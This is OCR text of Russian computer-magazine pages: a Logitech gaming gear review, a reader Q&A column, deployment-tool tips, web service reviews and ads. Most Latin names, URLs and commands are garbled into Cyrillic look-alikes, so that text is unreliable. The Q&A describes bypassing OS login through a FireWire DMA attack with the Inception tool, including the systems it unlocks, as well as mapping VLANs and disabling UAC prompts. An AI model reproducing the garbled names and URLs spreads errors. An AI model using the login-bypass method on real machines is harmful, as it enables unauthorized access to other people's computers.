Дизайн ІодіІесЬ 6100 Оатіпд Моизе достаточно лаконичен: симметричная (а значит, удобная в использо- 
вании как для правшей, так и для левшей) мышка, украшенная технологичным принтом, смотрится просто, 
но в то же время стильно. 

Предусмотрено три разрешения отслеживания перемещения: 1000, 1750 и 2500 точек на дюйм, причем 
переключаешься между режимами мгновенно и удобно — для этого можно просто нажать на кнопку, распо- 
ложенную за колесом прокрутки. Поэтому соблюдать баланс между возможностью выбирать цель с высокой 
точностью и быстрым перемещением в игровом пространстве можно и не прерывая игры. 

Производитель утверждает, что ресурс износа кнопок составляет 3 миллиона нажатий, а сенсора — 

250 километров. Так что манипулятор выйдет победителем из огромного количества сражений. На нижней 
поверхности ІодіІесЬ 0100 Оатіпд Моизе разместились тефлоновые накладки-ножки, они практически 
устраняюттрение и позволяют «хвостатой» перемещаться по поверхности настолько плавно, насколько 
это вообще возможно. Мышь достаточно легкая, чтобы двигаться быстро, но и достаточно тяжелая, чтобы 
создавать ощущение устойчивости и точности управления. 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 



Тип сенсора: оптический светодиодный 
Интерфейс: 115В, проводной 

Разрешение отслеживания перемещений: 

1000/1750/2500 фі 

Обработка изображения: 2,4 Мп в секунду 
Макс, ускорение: 23 д 
Клавиатура Макс, скорость: 160 дюймов в секунду 
(на оптимальной поверхности) 

Статический коэффициент трения — 
М(з):0,14 

Ресурс левой и правой кнопок: 

3 млн нажатий 
Ресурс износа: 250 км 
Количество кнопок: 4 + колесико 
Вес: 80 г 

Дополнительно: симметричная форма 





Мышь 



Интерфейс: 115В 
Дополнительные клавиши: 

10 (6 В-Кеу5, Сарв Іоск, Мит Іоск, 
ЗсгоІІ Іоск, Зоувііск зѵѵіІсЬ) 

Длина кабеля: 2 м 
Габариты: 476 х 193 х 29 мм 
Вес: 648 г 

Дополнительно: съемная 
подставка под запястья, 

6 программируемых клавиш (С1- 
С6), многоклавишные сочетания 
с одновременным нажатием до 
5 клавиш, переключения между 
игровым и рабочим режимами 



ВЫВОДЫ 

Компания ІодіІесЬ занимает весьма прочные позиции 
в сегменте игровых аксессуаров и манипуляторов, 
выпуская качественные и достойные внимания 
истинного геймера устройства. Подтверждение 
тому — рассмотренные нами ІодіІесЬ 0100 Оатіпд 
Моизе и ІодіІесЬ 0103 Оатіпд КеуЬоагсІ. Мышь удобно 
«лежит» в руках, не вызывая усталости даже при дли- 
тельной игре, при этом точно и своевременно реагиру- 
ет на команды. Клавиатура имеет съемную площадку 
для рук, программируемые клавиши и специальный 
игровой режим, а также отличается бесшумным ходом 
клавиш. В общем, выбор достойный! ^ 
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Созданы для общения. Идеальны для развлечений 





Г 



Мощный четырехъяд 
процессор (КЗУ2), яркий 
НО-дисплей, превосходный звук 
ОоІЬу ОідііаІ -что может быть 
лучше для любимых игр, видео и 
музыки! 



Долгая работа без подзарядки, 36 и 
\л/іРі позволят вам всегда быть на 
связи, а пакет офисных 
приложений - решать любые 
бизнес-задачи. 



Х^5сетЛ о 1 ОиасіХі 



\л/\л/\л/.Нио\л/еШеѵісе.ги 



Товар сертифицирован. Реклама, 




НУАѴѴЕІ 



РАО 



Глеб Чербов (сНегЬоНйдтаіІ.сот) 




ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(іКЕАІ.ХАКЕР.Ки 



Каким образом можно определить, 
какие ѴІАЫ используются в локальной 
сети и какие девайсы в каждой из них 
работают? 

Можно вручную отснифать пакеты 
и внимательно отслеживать метки ѴІАМ 
Ю, составляя таким образом список виртуаль- 
ных сетей. Это действенный способ, но не са- 
мый простой: с помощью тулкита Ргоддег 
( соппппопехрІоіІ5.сопп/?р=444 ) весь процесс 
можно автоматизировать. Надо сказать, что 
это не самостоятельная прога, а скрипт, 
который использует для своей работы ряд 
других утилит: ІзЬагк, агр-зсап и другие. Все 
необходимое по умолчанию включено 
в дистрибутив ВаскТгаск. 

После запуска Ргоддег довольно быстро 
определяет все используемые метки ѴІАМ, 
после чего с помощью модифицированной 
версии агр-5сап получает примерный список 
девайсов в каждой из виртуальных ІАМ. Если 
есть необходимость, то можно очень быстро 
настроить локальный интерфейс ѴІАМ, чтобы 
войти в интересующую виртуальную сеть. 

Многие сервисы, практикующие 
двухфакторную аутентификацию, 
предлагают использовать аппаратные 
генераторы одноразовых паролей. А что, соб- 
ственно, это такое? 

Напомню, что двухфакторная аутентифи- 
кация предполагает, помимо стандарт- 
ной связки логин/пароль, ввод некоего 
одноразового пароля, присылаемого сервером 



по запросу (например, по 5М5) или же 
сгенерированного на стороне клиента 
с помощью специального устройства (так на- 
зываемого токена). В таком устройстве 
на аппаратном уровне реализовано вычисле- 
ние функции Ьтас от секретного ключа, 
который, по идее, известен только серверной 
стороне, и некоего изменяющегося и актуаль- 
ного в текущий момент параметра. 

Большинство современных генераторов 
реализуют один из трех методов получения 
таких одноразовых параметров для генерации 
кода, продвигаемых международной инициа- 
тивной группой разработчиков систем строгой 
аутентификации ОАТН (Ореп АиТНепІісаІіоп). 

В первом случае — НОТР (НМАС-ЬазесІ Опе 
Тіте Раззѵѵогб) — для этого используется про- 
стой счетчик генераций пароля. То есть сер- 
верной стороне известно количество попыток 
входа, а в клиентском устройстве при каж- 
дой генерации счетчик инкрементируется. 

При этом исходное значение может задаваться 
случайным образом. 

Во втором случае — ТОРТ (Тіте-ВазесІ Опе 
Тіте РаззѵѵогсІ) — в качестве второго параме- 
тра используется текущее время. Как правило, 
текущее время округляется до значения, крат- 
ного 30 секундам, то есть каждые полминуты 
одноразовый пароль меняется. 

Третий тип аутентификации — ОСРА (ОАТН 
СЬаІІепде-Резропзе АІдогііЬт) — предполагает 
взаимодействие с серверной стороной, и в ка- 
честве параметра используется случайное 
значение, сгенерированное на сервере. Такие 



устройства обычно имеют либо клавиатуру 
для ввода пользователем предоставленного 
входного значения, либо интерфейс подклю- 
чения к ПК. 

Для своего проекта хочу реализовать 
двухфакторную авторизацию. 

Как это проще всего сделать? 

По сути, все необходимое уже реализо- 
вано. Для мобильных платформ (АпбгоісІ, 
І05, ВІаскВеггу) существует проверенный 
ОТР-генератор — боодіе АиіЬепІісаІог, 
реализующий алгоритмы генерации НОТР 
и ТОРТ. Как несложно догадаться из названия, 
это разработка Ооодіе, которую та поддержи- 
вает как проект с открытыми исходниками 
( сосІе.доодІе.сот/р/доодІе-аиіЬеп1іса1ог ). 
Именно это приложение используется 
для двухфакторной авторизации в ОтаіІ или, 
к примеру, ОгорЬох. Запрашивать дополни- 
тельный пароль на своем сервисе можно 
с помощью РАМ-модуля, который также 
доступен на сайте проекта. Есть другой 
вариант — сервис ОиоБесигіІу ( ѵѵѵѵѵѵ. 
сіиозесигііѵ.сот ]. Он предлагает удобный АРІ 
для интеграции в существующие сервисы 
и плагины для встраивания в популярные ОС, 
а также разные способы получения одноразо- 
вых паролей для пользователей (в том числе 
через 5М5). 

Есть ли какой-нибудь способ обхода 
аутентификации в ОС, не оставляющий 
следов? 










^ щ 

КАК ЭФФЕКТИВНО ДЕПЛОИТЬ (РАЗВЕРТЫВАТЬ) ВЕБ-ПРИЛОЖЕНИЕ? 



Делать проект на локальном компьютере 
и закачивать его на сервер по РТР — самая 
частая схема развертывания сайта. Но, увы, 
ее удобство заканчивается ровно тогда, когда 
сайт перерастает уровень домашней страницы 
и работать с ним начинают несколько человек. 
Как делать это правильно и удобно? Расскажем 
о нескольких проверенных временем решениях 
и лучших практиках. 



ДВА ВАЖНЫХ ТРЕБОВАНИЯ 

Первое требование — код обязательно должен 
быть в репозитории кода (например, бИ), 
который можно хостить, скажем, на бесплатном 
аккаунте ВИВискеІ: ( ЬіІіЬискеЕогд ). Второе — 
развертывание кода и баз данных на серверы 
должно происходить автоматически и за мини- 
мум времени. Рекомендуем тебе выбрать один 
из четырех инструментов. 



САРІ5ТЯАМ0 ( САРІ5ТЯАН0ЯВ.С0М І 

Один из самых мощных тул китов 
для автоматизации развертывания 
веб-приложений. Правила развертывания обо- 
значаются с помощью специального В5Е-языка, 
в котором прописывается, какие действия 
необходимо выполнить на каждом из использу- 
емых серверов. Настройка упрощается за счет 
большого количества плагинов. 
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Вопросы и ответы 



□ Один из самых изящных способов обхода 
аутентификации — относительно новая 
атака через подключение к атакуемой системе 
при помощи интерфейса ІЕЕЕ 1394 (РігеѴѴіге). 
Для достижения максимальной пропускной 
способности шины в архитектуру интерфейса 
была заложена поддержка прямого взаимо- 
действия с памятью (ОМА). Что, в свою 
очередь, означает возможность манипуляций 
прямо в адресном пространстве атакуемой 
системы в обходдаже центрального процессо- 
ра и, конечно, операционной системы 
с разнообразными механизмами защиты. 

Более того, атака может быть проведена, даже 
если атакуемая система находится в режиме 
сна (зизрепсі), когда в активном состоянии 
только оперативная память, хранящая всю 
информацию на момент «засыпания», и ряд 
интерфейсов. 

Провернуть такой фокус поможет замеча- 
тельная утилита Іпсерііоп [ ѵѵѵѵѵѵ.ЬгеакпепІег. 
огд/рго]есІ5/іпсер^іоп ), обязанная названи- 
ем, очевидно, одноименному кинофильму. 
Подобно его героям ты с легкостью сможешь 
вторгаться в сновидения мирно спящих 
хранителей секретов и, например, вносить 
изменения по определенным адресам. После 
пробуждения окошко входа в систему примет 
любое значение в качестве пароля. В комплек- 
те идет набор паттернов для поиска в памяти 
нужных значений и автоматического отпира- 
ния ворот авторизации различных операцион- 
ных систем. В настоящий момент реализован 
анлок ѴѴіпсІоѵѵз 8 5Р0, ѴѴіпсІоѵѵз 7 5Р0-1, Ѵізіа 
5Р0 и 5Р2, ѴѴіпсІоѵѵз ХР 5Р2-3, Мае 05 X 5поѵѵ 
ЕеорагсІ, Ыоп и Моипіаіп Ыоп, а также ОЬипІи 
последних версий. Стоит отметить, что режи- 
мом ОМА обладает и новый интерфейс, ис- 
пользуемый компанией Арріе, — ТЬипсІегЬои, 
что делает его тоже потенциально уязвимым 
к подобному типу атак. 



□ Я использую ѴѴіпсІоѵѵз 8 Епіегргізе 
на моей машине. Большую часть 
времени мне нужны права администратора 
для отладки, изменения системных файлов 
и так далее. В «семерке» можно было 
установить настройку ІІАС в положение 
«Никогда не спрашивать», что полностью 
избавляло от необходимости подтверждать 
свои действия. В ѴѴіпсІоѵѵз 8 этот трюк больше 



ТРУЕСРУРТ: НЕ ТАКОЙ УЖ И СКРЫТЫЙ 



Я ИСПОЛЬЗУЮ КРИПТОКОНТЕЙНЕР ТРОЕСРУРТ ДЛЯ ХРАНЕНИЯ 
НЕКОТОРЫХ КОНФИДЕНЦИАЛЬНЫХ ДАННЫХ. ЭТОТ КОНТЕЙНЕР 
СКРЫТЫЙ. ПРАВИЛЬНО Я ПОНИМАЮ, ЧТО НАЙТИ ЕГО В СИСТЕМЕ 
НЕВОЗМОЖНО? 



Увы, нет. Даже если хорошо спрятать образ криптоконтейнера, установить 
Г ему сбивающие с толку атрибуты, изменить расширение файла — его все 
равно довольно просто обнаружить. По ряду признаков можно достаточно 
точно определить, что файл является криптоконтейнером популярного решения 
ТгиеСгурІ; (он особенно популярен, поскольку рапространяется с открытыми исход- 
никами). Хорошо подтверждает теорию бесплатная утилита ТСНипІ; ( Ібз.из/ТСНипІ:/ 
Іад), которая практически со 100%-й вероятностью определяет, что на жестком 
диске есть криптоконтейнеры. В основе лежат четыре довольно тривиальных 
параметра, которые практически не дают ложных срабатываний. Как заверяет 
автор, он устал доказывать людям, что их скрытые криптоконтейнеры не такие уж 
и скрытые, и потому реализовал подобную утилиту, которая отлично работает под 
ѴѴіпсІоѵѵз, Ыпих, Мае 05 X. Интересно, что ТСНипІ; определяет и факт шифрования 
всего диска (в ТгиеСгурІ; есть такая опция): его выдает строка «ТгиеСгурІ; Вооі; 
Ьоасіег» в первых 512 байтах образа диска. 




Одна-единственная строка в образе жесткого диска с потрохами выдает использование криптоконтейнера 



СНЕР ( ѴѴѴѴѴѴ.ОРЗСОРЕ.СОМ/СНЕР ) 

Это решение используется внутри мно- 
гих крупных компаний, которым жиз- 
ненно необходимо выполнять одни и те же дей- 
ствия сразу на десятках, сотнях, а то и тысячах 
серверов. Правила настройки (скажем, АрасНе, 
Му50Ь и Насіоор) — их называют рецепты — 
оформляются в так называемые сооЬоок'и, 
которые распространяются по хостам. 




РАВтС (РАІРІкБМб) 

Очень понятный и простой в освоении 
инструмент для автоматизации деплоя. 
С помощью РуШоп-сценариев далее можно 
очень удобно расписать необходимые действия, 
в том числе развертывания кода из репо- 
зитория на боевом сервере, которые будут 
выполнены на группе серверов. Можно начать 
именно с РаЬгіс. 



ОЕРЮУ виттон 
( РЕРіоувиттом.сом і 

Этот сервис поможет в использовании 
описанных инструментов. Идея простая: ты 
обозначаешь, откуда будут забираться исходные 
файлы, куда их нужно будет развертывать и ка- 
ким из способов делать (поддерживаются в том 
числе СбеІ" и Сарізігапо). В результате получаешь 
быстрый деплой с помощью одной кнопки мыши. 
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не работает: даже с отключенным ІІАС мне 
по-прежнему приходится делать подтвержде- 
ния для выполнения опасных с точки зрения 
системы операций. Как от этого избавиться? 

□ Если перейти в «Асітіпізігаііѵе Тооіз ^ 
ІосаІ Зесигііу Роіісу», найти там «ІосаІ 
Роіісіез ^ Зесигііу Орііопз», то среди прочего 
будет настройка «ІІзег Ассоипі Сопігоіз Асіппіп 
АрргоѵаІ Мосіе», которую необходимо отклю- 
чить. После этого система не будет докучать 
подобными запросами. 

□ Как вернуть привычную кнопку «Пуск» 
в интерфейс ѴѴіпсІоѵѵз 8? 

□ Стандартными инструментами винды — 
никак. Единственное, что нам остает- 
ся, — это установить в систему альтернатив- 
ную реализацию привычного меню. Не могу 
не рассказать здесь о Роккі ( ѵѵѵѵѵѵ.роккі.сопп ). 
которая не просто реализовала знакомый 
интерфейс, но еще и доработала идею. 

С помощью меню можно быстро искать 
приложения и файлы. Сюда же можно добавить 
в закладки любимые приложения, сайты, 
файлы и папки для быстрого доступа. Но самая 
сочная фишка — это внутренний магазин 
приложений Роккі Арр 5іоге, позволяющий 
добавить интерактивные элементы (например, 
для отображения последних писем, пришед- 
ших в бтаіі). 



□ Вот и настал тот день, когда скрипты 
на ЬазЬ'е уже не умещаются в десяток 
строк кода. Приходится писать довольно 
сложные сценарии, которые весьма гемор- 
ройно отлаживать. Существует ли нормаль- 
ный отладчик для ЬазЬ-скриптов? 

□ Лучшее решение — ВА5Н ОеЬиддег 
( ЬазЬсІЬ.зоигсеІогае.пеЛ . Это отладчик 
исходного кода ЬазЬ-скриптов, позволяющий 
пошагово выполнять сценарий и использовать 
для управления команды дбЬ. Можно легко 
управлять параметрами, которые влияют 
на выполнение скрипта, или установить 
брейкпоинт при наступлении определенных 
событий. Отличная утилита не только 
для бывалых админов, но и для тех, кто только 
начинает осваивать ЬазЬ. К слову, существуют 
форки проекта, например для командной 
оболочки 2 зЬ — 2зЬс1Ь ( Ьирз://діІ:ЬиЬ.сопп/ 
госкѵ/гзЬсІЬ ). 



□ Удивительное дело, как, оказывается, 
просто можно разработать приложение 
для ІОБ и АпсІгоісІ, воспользовавшись 
РЬопеСар или Тііапіит МоЬіІе Оеѵеіортепі 
Р1а(!огт. И насколько неудобно отслеживать 
количество загрузок и покупок в магазинах 
приложений Арр 5(оге и Соодіе РІау. 

Как к этой проблеме подходят опытные 
издатели, чтобы получить обобщенную 
и наглядную статистику? 

□ Каждый из магазинов приложений 
худо-бедно показывает количество 
загрузок и установок, но спору нет — 
это не то представление, с которым хотелось 
бы работать. Ктомуже разработчики, которые 
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Роккі — реинкарнация кнопки «Пуск» в ѴѴіпсіоѵѵб 8 



успели начать писать для разных платформ, 
вынуждены смотреть статистику сперва 
в одном магазине, а потом в другом. К счастью, 
у обеих платформ есть экспорт данных, 
которые можно обработать сторонними 
инструментами. Есть немало десктопных 
приложений, предлагающих удобную обработ- 
ку и представление данных, но мы советуем 
два онлайн-сервиса — Арр Аппіе [ ѵѵѵѵѵѵ. 
арраппіе.сот ) и Оізііто ( ѵѵѵѵѵѵ.сіізііппо.сопп ]. 
Каждый из них имеет бесплатные аккаунты, 
возможностей которых хватит большей части 
разработчиков. Таким образом, можно быстро 
отслеживать количество загрузок, прибыль 
от продаж, позицию в рейтинге магазина, 
отзывы потребителей, в том числе с разбиени- 
ем по странам. 

Существует ли менеджер пакетов 
для веб-проектов, позволяющий 
быстро установить актуальную версию 
нужных библиотек (скажем, іОиегу)? 

Такой менеджер пакетов делает Тѵѵіиег 
и ведет его как открытый проект — 

Воѵѵег ( ЬирзѴ/дііЬцЬ.соппЛѵѵіиег/Ьоѵѵег ). Он 
позволяет быстро установить все популярные 
Э5- и С55-библиотеки, удовлетворив необхо- 
димые зависимости. К примеру, чтобы 
установить ]Оиегу, потребуется одна команда: 

Ьоыег іпзііаіі ідиегѵ 

Э5-скрипт будет скачан в ./сотропеп1з/]диегу. 

Установить сам Воѵѵег необходимо с ис- 
пользованием Мос1е.]з ( пос1е]з.огд ] и прт 
( прпп]з.ога ]: 

прт іпзііаіі Ьоыег 

Список всех пакетов (а он по-настоящему 
впечатляет) можно получить с помощью коман- 
ды Ьоѵѵег ІізЕ 





□ У меня есть статический сайт, но очень 
хотелось бы добавить к нему систему 
комментариев. Можно ли это делать без про- 
граммирования с моей стороны? 

□ Конечно, существует немало сервисов 
комментирования. Вот навскидку 
несколько: 

• Іп^епвеРеЬа^е ( ѵѵѵѵѵѵ. іпІепзесІеЬаІе. сот ). 
Один из самых первых подобных проектов, 
который легко подключается к нужной 
странице, устанавливая специальный код. 
Есть готовые решения для популярных 
движков. 

• РІ5дц5 ( сПздиз.соіті ). Не менее популярный 
сервис, позволяющий реализовать систему 
общения (в том числе с рейтингом каждого 
поста) на любой странице сайта (даже если 
это полностью статические НТМЕ-ки, кото- 
рыехостятся на ОгорЬох). Бонусом получает 
продвинутую систему модерации. 

• Цуе^уге ( ѵѵѵѵѵѵ.Ііѵе(ѵге.сопп ). Этот проект 
отличается от предыдущих интересной 
фишкой: пользователь может комментиро- 
вать не только страницу (например, статью), 
но и конкретную ее часть. Цитируемая часть 
особенным образом выделяется. 



Помимо этого, не стоит забывать 
про виджеты социальных сетей (в том числе 
РасеЬоок'а и «ВКонтакте»), которые также 
предоставляют виджеты для быстрого ком- 
ментирования. 



□ 



Какой декомпилятор для .ЫЕТ лучший? 



□ Очень неплохой декомпилятор, который 
мы не раз использовали в бою, — 
боіРеек ( ^еіЬгаіпз.соіп/сІесоппріІег ) от ЭеіВгаіпз 
(создателей РеБЬагрег, дополнения кѴізиаІ 
Біисііо, которое использует огромное количе- 
ство .МЕТ-программистов). Что приятно, утили- 
та бесплатная. □Г 
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6 РЕЦЕПТОВ ПРОГРАММИСТАМ НААМОРОІО «в 
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иМІТ5/ѴѴѴѴѴѴ2 



ѴѴѴѴѴѴ2 




Удобный и приятный сервис длятуннелирования на всех платформах 



ТиММЕІВЕАР 



^иппеІЬеаг.сот 



Ты наверняка не раз сталкивался с тем, что твой российский ІР-шник автоматически 
делает тебя третьесортным человеком в интернете. Если тебе когда-нибудь хотелось 
посмотреть, что собой представляют такие знаменитые сервисы, как Ниіи, Ме^Пх или 
Зроііі'у, — каждый раз тебе подсовывали плашку, суть которой сводилась к тому, что 
тебе здесь не рады. ТиппеІВеаг — удобный, красивый и недорогой прокси-сервис, 
позволяющий получить американский ІР для подобных целей. Разработчики пред- 
усматривают клиенты для ѴѴіпсІоѵѵз, Мае 05 X, АпсІгоіеІ и І05 — таким образом, с одной 
учеткой за пять долларов в месяц можно получить неограниченный туннелированный 
трафик на всех своих устройствах. Бесплатно доступно 500 мегабайт в месяц. 




Инструмент для переноса мультимедийныхфайлов 
между различными онлайн-сервисами 



РІ.РЕ 



дкде 

Каждый из нас за последнее время наверняка оброс разнообразными облачными 
сервисами, фото- и видеохостингами, учетками в социальных сетях и другим цифровым 
балластом. И вот незадача — твой контент в социальной сети часто оказывается труд- 
нодосягаемым. Хочешь перенести 500 фоток из твоего профиля в социалке в Рісаза? 
Делай это вручную — разработчики совсем не заинтересованы в том, чтобы упростить 
эту работу. Рі.ре решает эту проблему: предоставляет простой интерфейс для мигра- 
ции данных с одного сервиса на другой. Поддерживаются все облачные хранилища 
(ОгорЬох, Вох.пеі, 5идаг5упс, боодіе Огіѵе, Зкусігіѵе), фотохостинги (РІіскг, Рісаза) и со- 
циальные сети (РасеЬоок, Іпзіадгат). 



КЕДРУ ТО 6ЕТ 
МОВІІЕ? 




д иірм“іміит?іліішіхйіш 




Хорошая отправная точка перед началом адаптации 
сайта для мобильныхустройств 



РЕАОУТООЕТМОВІЕЕ? 



Ьоѵуіодоітіо.сопп 

Сервис от Соодіе позволяет провести набор простейших тестов для оценки «мобильности» 
твоего сайта. Насколько удобно будет кликать по навигационным элементам? Не слишком 
ли кучно расположены кнопки? Как будет выглядеть на маленьком экране главная стра- 
ница сразу после загрузки? Сколько времени понадобится на загрузку? Сервис указывает 
на проблемные места и дает различные советы, как их устранить, — неплохая отправная 
точка для «мобилизации» твоего ресурса. Ну а когда ты займешься непосредственно 
адаптацией сайта, ты сможешь воспользоваться специализированными инструментами 
для тестирования верстки на различных экранах, например гезропзіѵе.із. 
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РгоЯІе 
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РгоШр к ішівіюё 
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РгоЛІе ІЭ ГЩР( 

чѵНЬ МегкІЬ' іррс 


ПНЕ[} 





МОІІѴЙ'ІЙГМІІ СІПСІОС 
см рОА 


НХЕІ> 


Ф 


Ук«йг* 

/огаіЬ 


НК 



Наглядный инструментдля сетевых параноиков, 
которых в последнее время становится все больше 



РРІѴАСУЕІХ 



ргіѵасуЛх.сот 

РгіѵасуЯх — бесплатный сервис и расширение для браузеров Соодіе СЬготе и Мо 2 ІІІа 
Рігеі'ох, анализирующий то, как два главных любителя пользовательских данных — 
Соодіе и РасеЬоок — собирают о тебе информацию. Дело в том, что часто причиной 
утечки данных может оказаться какая-нибудь галочка, спрятанная глубоко в настрой- 
ках сервиса, — РгіѵасуПх может показать, как та или иная настройка профиля выдает 
тебя с потрохами, и дать рекомендации, что необходимо изменить. В будущем список 
поддерживаемых сервисов увеличится — появится анализ деятельности сервисов 
Тѵѵіиег и ЫпкесІІп. В общем, советую попробовать данное расширение — вполне воз- 
можно, что тебя неприятно удивят результаты анализа. 
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КС9713В 

9 . 7 " 



НЕ ПОДРАЖАЙ — 
ЗАДАВАЙ ТРЕНД! 




РиШге І5 поѵѵ!* 




9690Р 



Два цвета 
1Р5-матрица 
АпсІгоісІ 4.0.3 
Игровой процессор 
Две камеры (2+2 Мп) 
Встроенный ЗС-модем 
Приемник СР5 




\/ѵ\/ѵѵѵ.З-0.ги/ргото2/971 3 

Реклама. © 2006-2012 ЗО. Упомянутые и/или используемые 
торговые марки, зарегистрированные товарные знаки, 
элементы интерфейса и фирменной символики являются 
интеллектуальной собственностью их правообладателей. 
Товар сертифицирован. * Будущее сейчас. ** Цена указана в 
рублях и носит рекомендательный характер для Российской 
Федерации. Фактические цены в магазинах и иных точках 
продаж могут отличаться от указанных в большую или 
меньшую сторону. 



-^1Р5 Яісхкс/іір ЗС С 08^ 

ім ріАМЕ 5ѴѴІТСНШС " МоЬіІѳ Зегѵіс( 

Компания 30 

Производитель мобильных компьютеров и аксессуаров 



Соо§1е ріау 

Где купить? 

ѵѵѵѵѵѵ.З-О.ги/Ьиу 




Нэ правах рекламы. 




тхр 




Все Мы постоянно 
находимся в поиске... 



...но стоит ли искоть 
идеальный компьютер? 



БОЛЬШЕ НЕ НАДО ИСКАТЬ 

Мы его уже сделали. 






О еозможа&стн прі+обрйтйні^я компыогерОЕі МХР в Взшйм города 
Вы можоте узыать ма с^ііте: 

І^ііи •■,^ѵі,".-‘.".ѵ.у!тап:. г-ытхр^ 



3 года гарантии 
иа пюйыѳ кймпыйТЁры 




